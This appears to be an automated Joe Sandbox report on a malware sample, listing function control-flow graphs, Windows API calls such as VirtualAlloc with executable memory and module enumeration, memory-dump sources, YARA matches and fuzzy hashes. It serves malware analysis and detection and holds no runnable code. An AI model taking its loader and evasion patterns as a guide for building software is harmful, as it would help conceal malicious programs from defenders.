                                                                                                  control_flow_graph 41 43887c6-43887df 42 43887e1-43887e3 41->42 43 43887ea-43887f6 CreateToolhelp32Snapshot 42->43 44 43887e5 42->44 45 43887f8-43887fe 43->45 46 4388806-4388813 Module32First 43->46 44->43 45->46 53 4388800-4388804 45->53 47 438881c-4388824 46->47 48 4388815-4388816 call 4388485 46->48 51 438881b 48->51 51->47 53->42 53->46
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 043887EE
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0438880E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: eabaf22ebb7b6422de57d8e2a02ceff64d6d78b4d983bd16eb476d3cb35f6c76
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: CCF062362007146BD7247BB5A88DA6AB6E8AF49765F50152CE642910C0DA70F8454661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 15 5dd0420-5dd04f8 17 5dd04ff-5dd053c CreateWindowExA 15->17 18 5dd04fa 15->18 20 5dd053e 17->20 21 5dd0540-5dd0558 PostMessageA 17->21 19 5dd05aa-5dd05ad 18->19 20->19 22 5dd055f-5dd0563 21->22 22->19 23 5dd0565-5dd0579 22->23 23->19 25 5dd057b-5dd0582 23->25 26 5dd05a8 25->26 27 5dd0584-5dd0588 25->27 26->22 27->26 28 5dd058a-5dd0591 27->28 28->26 29 5dd0593-5dd0597 call 5dd0110 28->29 31 5dd059c-5dd05a5 29->31 31->26
                                                                                                  APIs
                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DD0533
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                  • API String ID: 716092398-2341455598
                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction ID: e685e120e65cb4f836bc9a60c006d1e34072bcfffe8d5d8c16f1f15b559413e6
                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction Fuzzy Hash: 01512870D08388DAEB11CBA8C849BEDBFB2AF51708F144059D5446F2C6D3BA5658CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 32 5dd05b0-5dd05d5 33 5dd05dc-5dd05e0 32->33 34 5dd061e-5dd0621 33->34 35 5dd05e2-5dd05f5 GetFileAttributesA 33->35 36 5dd05f7-5dd05fe 35->36 37 5dd0613-5dd061c 35->37 36->37 38 5dd0600-5dd060b call 5dd0420 36->38 37->33 40 5dd0610 38->40 40->37
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DD05EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID: apfHQ$o
                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction ID: 97021847b372dd07ac09906e172f9a1d69b2c5d1071a23119fbdf493512fd7f9
                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction Fuzzy Hash: 04011E70C0424CEBDB10DBA8C5187AEFFB5AF41308F148099C4492B241E7769B58CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 04388485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 54 4388485-43884bf call 4388798 57 438850d 54->57 58 43884c1-43884f4 VirtualAlloc call 4388512 54->58 57->57 60 43884f9-438850b 58->60 60->57
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 043884D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: 6cfb6ebe28ec5a2357c1d0bff875059bc1898b656da3c4a181ca576f15f3355a
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: DF113C79A00208EFDB01EF98C985E99BBF5AF08350F458094F9489B361D375EA90DF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 05DEF030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 300 5def030-5def078 call 5e00160 call 5df4914 call 5ddd040 308 5def080-5def086 300->308 309 5def090-5def0c2 call 5dfbdc0 call 5ddcea0 308->309 314 5def0ce-5def112 309->314 315 5def0c4-5def0c9 309->315 319 5def118-5def11d 314->319 320 5def114-5def116 314->320 316 5def3bf-5def3e0 call 5df4690 315->316 323 5def42d-5def46c 316->323 324 5def3e2-5def3e6 316->324 322 5def120-5def129 319->322 325 5def12f-5def158 call 5de6480 call 5df25a2 320->325 322->322 326 5def12b-5def12d 322->326 358 5def46e 323->358 359 5def48f-5def4b2 323->359 327 5def3ec-5def401 324->327 328 5def7ca-5def7da call 5de24b0 324->328 341 5def15e-5def197 call 5de5030 call 5dde6e0 325->341 342 5def222-5def285 call 5de6480 call 5de4990 call 5de32a0 call 5de6370 325->342 326->325 327->309 336 5def407-5def428 327->336 338 5def7dc-5def7df 328->338 339 5def7ed-5def822 call 5ddf8f0 328->339 336->309 338->308 350 5def826-5def82c 339->350 370 5def20f-5def214 341->370 371 5def199-5def19e 341->371 399 5def287-5def290 call 5df2f27 342->399 400 5def293-5def2b7 342->400 355 5def82e-5def830 350->355 356 5def832-5def834 350->356 361 5def840-5def84f call 5de4840 355->361 362 5def837-5def83c 356->362 367 5def470-5def478 358->367 368 5def4b8-5def4bf 359->368 369 5def4b4-5def4b6 359->369 361->350 384 5def851-5def883 call 5ddf8f0 361->384 362->362 364 5def83e 362->364 364->361 374 5def47a-5def487 367->374 375 5def48b 367->375 378 5def4c2-5def4c7 368->378 377 5def4cb-5def4ef call 5de6070 call 5de32a0 369->377 370->342 376 5def216-5def21f call 5df2f27 370->376 379 5def1ac-5def1c7 371->379 380 5def1a0-5def1a9 call 5df2f27 371->380 374->367 402 5def489 374->402 375->359 376->342 407 5def4f3-5def506 377->407 408 5def4f1 377->408 378->378 386 5def4c9 378->386 381 5def1c9-5def1cd 379->381 382 5def1e2-5def1e8 379->382 380->379 390 5def1ee-5def20c 381->390 391 5def1cf-5def1e0 call 5df0f40 381->391 382->390 406 5def887-5def88d 384->406 386->377 390->370 391->390 399->400 415 5def2b9-5def2c0 400->415 416 5def2e3-5def31a 400->416 402->359 410 5def88f-5def891 406->410 411 5def893-5def895 406->411 422 5def508-5def511 call 5df2f27 407->422 423 5def514-5def584 call 5df1602 call 5dfbdc0 call 5df4690 407->423 408->407 413 5def8a1-5def8b0 call 5de4840 410->413 414 5def898-5def89d 411->414 413->406 429 5def8b2-5def8ec call 5de4990 call 5de32a0 413->429 414->414 418 5def89f 414->418 415->416 419 5def2c2-5def2ce 415->419 435 5def38c-5def3a8 416->435 436 5def31c-5def334 416->436 418->413 424 5def2d7 419->424 425 5def2d0-5def2d5 419->425 422->423 469 5def5dd-5def637 423->469 470 5def586-5def58a 423->470 428 5def2dc 424->428 425->428 428->416 445 5def8ee 429->445 446 5def8f0-5def908 429->446 451 5def3aa-5def3b3 call 5df2f27 435->451 452 5def3b6-5def3b9 435->452 436->435 447 5def336-5def362 call 5df2a56 436->447 445->446 454 5def90a-5def913 call 5df2f27 446->454 455 5def916-5def953 call 5de4990 call 5de32a0 446->455 447->435 466 5def364-5def389 call 5df34a2 call 5df43d8 447->466 451->452 452->316 454->455 473 5def957-5def966 455->473 474 5def955 455->474 466->435 503 5def65f-5def67d 469->503 504 5def639 469->504 470->328 476 5def590-5def5b1 470->476 483 5def968-5def971 call 5df2f27 473->483 484 5def974-5def980 473->484 474->473 476->309 486 5def5b7-5def5d8 476->486 483->484 488 5def98e-5def9a8 484->488 489 5def982-5def98b call 5df2f27 484->489 486->308 493 5def9aa-5def9b3 call 5df2f27 488->493 494 5def9b6 488->494 489->488 493->494 496 5def9ba-5def9d0 494->496 505 5def67f-5def681 503->505 506 5def683-5def68d 503->506 507 5def640-5def648 504->507 508 5def699-5def6bb call 5de6070 call 5de32a0 505->508 509 5def690-5def695 506->509 510 5def64a-5def657 507->510 511 5def65b 507->511 519 5def6bf-5def6d5 508->519 520 5def6bd 508->520 509->509 512 5def697 509->512 510->507 516 5def659 510->516 511->503 512->508 516->503 522 5def6d7-5def6e0 call 5df2f27 519->522 523 5def6e3-5def74b call 5df1602 call 5dfbdc0 519->523 520->519 522->523 534 5def75c-5def761 523->534 535 5def74d-5def756 523->535 536 5def763-5def784 534->536 537 5def7b0-5def7b2 534->537 535->534 542 5def7e4-5def7e8 535->542 536->309 546 5def78a-5def7ab 536->546 539 5def7bd-5def7bf 537->539 540 5def7b4-5def7ba call 5df158d 537->540 539->328 541 5def7c1-5def7c7 call 5df158d 539->541 540->539 541->328 542->496 546->308
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                  • String ID: "
                                                                                                  • API String ID: 430003804-123907689
                                                                                                  • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                  • Instruction ID: a14fc26554a8ebd715a4244b11b1e3973ad1bccdfc27ef0da36a90e89e3d7adc
                                                                                                  • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                  • Instruction Fuzzy Hash: DE42D371508381ABDB21EF64CC48F9B7BE8BF85304F04092EF58997291DB75D649CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE00D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                  • Instruction ID: 6ebc85a23b75415406ebf85011e4528dc93da42cb9408235a0aac3b160c788fa
                                                                                                  • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                  • Instruction Fuzzy Hash: 44525E71D04208DBDF11EFA8DC89BAEB7F5FF04304F14816AD419A7290E775AA49CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDE6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcsstr.LIBCMT ref: 05DDE72D
                                                                                                  • _wcsstr.LIBCMT ref: 05DDE756
                                                                                                  • _memset.LIBCMT ref: 05DDE784
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC1F
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC34
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC4D
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC62
                                                                                                    • Part of subcall function 05E1FC0C: std::regex_error::regex_error.LIBCPMT ref: 05E1FC74
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC82
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC9B
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FCB0
                                                                                                  • _wcsstr.LIBCMT ref: 05DDEA0C
                                                                                                  • _memset.LIBCMT ref: 05DDEE5C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 1338678108-0
                                                                                                  • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                  • Instruction ID: 4ccbc6606aa6bc6e584e62b4505ce33e1b3019a133424d8788f7ef4f88a667fb
                                                                                                  • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                  • Instruction Fuzzy Hash: AD52AE71A002199FDF24DF68CC94BAEFBF9FF44304F14456AD84AAB281D731A945CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE0B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                  • Instruction ID: a68c625a66429ff84a14ed151a3fd9b9ab3c5615e556cdc6f4dfcdcb2a4074ff
                                                                                                  • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                  • Instruction Fuzzy Hash: 8E425D71E04208EBDB15EFA4CC49BEEB7F5FF04308F24416AD416A7290E771AA45CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDDBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction ID: 1532e2b41689e666ba52d33e3571fb28825815b857ece7365e2d2d61e8535eb3
                                                                                                  • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction Fuzzy Hash: C5527170E00249DFDB11DBA4C848FAEFBB9FF49704F148199E549AB290DB74AD45CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040A32F Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040A3C1,004142EC,00000001,?,0040A4D8,004142EC,00000017), ref: 0040A334
                                                                                                  • UnhandledExceptionFilter.KERNEL32(004142EC,?,0040A3C1,004142EC,00000001,?,0040A4D8,004142EC,00000017), ref: 0040A33D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1987958618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1987943841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1987974116.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1987989482.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988003345.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988003345.0000000000421000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988058136.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988058136.000000000409F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_mU2p71KMss.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 201c1a21d9426f2c703b029de822ecd4bba0d46c1206059840ca0e40a68c95d5
                                                                                                  • Instruction ID: 307cec53737e5789a00372f04ba6450ea43eb2a69cdbc6aada34296422148bc5
                                                                                                  • Opcode Fuzzy Hash: 201c1a21d9426f2c703b029de822ecd4bba0d46c1206059840ca0e40a68c95d5
                                                                                                  • Instruction Fuzzy Hash: F8B09231044208BBCA026BE1ED09BC83F28EB09672F118020FB4D84060CBA294608BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E522C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $
                                                                                                  • API String ID: 0-3993045852
                                                                                                  • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                  • Instruction ID: 38642c7c2bb5ddaa533ff7ffbdbb9260b449aadc2da39dad106789a5a783a176
                                                                                                  • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                  • Instruction Fuzzy Hash: 053283B4E002299BEF619F64CC44BAEB779FF44714F0051EAEB4DA2191DB748A80CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405A52 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetProcessHeap.KERNEL32(004043B2,004199F8,00000014), ref: 00405A52
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1987958618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1987943841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1987974116.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1987989482.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988003345.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988003345.0000000000421000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988058136.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1988058136.000000000409F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_mU2p71KMss.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 9f123d81dc24df98ac9dbbdec7ea2d7ca94bd84cda50fe16fecb41661c46a851
                                                                                                  • Instruction ID: 8ae5e9a541f790f3e7328ec155afd2371131d607e68bf3e9c667266f703b20ac
                                                                                                  • Opcode Fuzzy Hash: 9f123d81dc24df98ac9dbbdec7ea2d7ca94bd84cda50fe16fecb41661c46a851
                                                                                                  • Instruction Fuzzy Hash: 69B012B030220347470C8F397D5914939D4670C202304813E7007C2160DF20C460DA08
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD5DF7 Relevance: .7, Instructions: 723COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                  • Instruction ID: 37abfd36cf8cd6f5e401de5ba81119ebe432c457c518ac10668d34a32f99050e
                                                                                                  • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                  • Instruction Fuzzy Hash: 0742B071629F159BC3DAEF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDA026 Relevance: .5, Instructions: 478COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                  • Instruction ID: 67fc871f7726498ae70fab8955665225d6a6fbcd02bffd48c826b0c01673f343
                                                                                                  • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                  • Instruction Fuzzy Hash: 0922DF76908B129FC714CF19D08095AF7E1FF88324F558A6EE8A9A7B10C730BA55CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD2B60 Relevance: .4, Instructions: 443COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                  • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                  • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                  • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD3520 Relevance: .4, Instructions: 427COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                  • Instruction ID: a4af6ff118187997f4259237f234cb687f3f42e1a9a6df242d56bdaaa576a1e2
                                                                                                  • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                  • Instruction Fuzzy Hash: F8024C715187058FC756EF0CD49035AF3E1FFC8305F198A2DD68987A64E739A9198F82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD89D0 Relevance: .4, Instructions: 351COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
